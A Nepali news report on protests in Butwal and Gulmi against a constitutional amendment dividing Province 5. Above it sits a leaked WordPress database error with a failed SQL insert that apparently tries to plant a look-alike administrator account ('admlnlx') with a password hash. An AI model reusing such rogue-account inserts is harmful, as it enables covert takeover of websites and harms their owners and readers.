WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtYEFPMgBUHYuBQrXfroZSJibeoiSI0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 09:06:04', '', 'admlnlx', 'admlnlx')
बुटबल,मंसिर १९-
सरकारले प्रदेश नं. ५ को पहाड र तराईलाई अलग–अलग बनाउने गरी संविधान संशोधन प्रस्ताव संसदमा दर्ता गराएको विरोधमा लगातारजसो प्रदर्शनहरु भइरहेका छन् ।आजपनि बुटवलमा बिहानैदेखि प्रदर्शन गरिएको छ । रुपन्देहीका विभिन्न ठाउँमा प्रधानमन्त्रीविरुद्ध नाराबाजीसमेत गरिएको छ ।
संविधान संशोधनको विरुद्ध संस्थागत निर्णय गरेको एमालेसहितका अरु दलका नेता कार्यकर्ता पनि आन्दोलनमा लागेका छन् ।काठमाडौंमा दुई सत्ताधारी कांग्रेस र माओवादी केन्द्रले संशोधन प्रस्ताव दर्ता गराएपनि प्रदेशस्तरमा कार्यकर्ताले त्यसलाई ठाडै चुनौति दिएका छन् । कांग्रेस माओवादी केन्द्रका केन्द्रीय नेता र सांसदनै सरकारी प्रस्तावविरुद्ध प्रदर्शनमा सहभागि भएका छन् ।
गुल्मीमा भने संशोधन प्रस्तावको विरोधमा अनिश्चितकालिन आम हड्ताल आह्वान गरिएको छ । राजनीतिक दल, संघ संस्था, पत्रकार, नागरिक समाजको गएराति बसेको बैठकले आन्दोलन सशक्त बनाउन भन्दै आमहड्तालको आह्वान गरिएको हो ।
यातायात, पसल, सरकारी कार्यालय सबै बन्द गरिएको छ भने शैक्षिक संस्था पनि खोल्न दिइने छैन । प्रदेश सिमांकनको विरोधमा गुल्मी, अर्घाखांची, रोल्पा र प्यूठानमा पनि दिनहँु नाराबाजी भैरहेको छ ।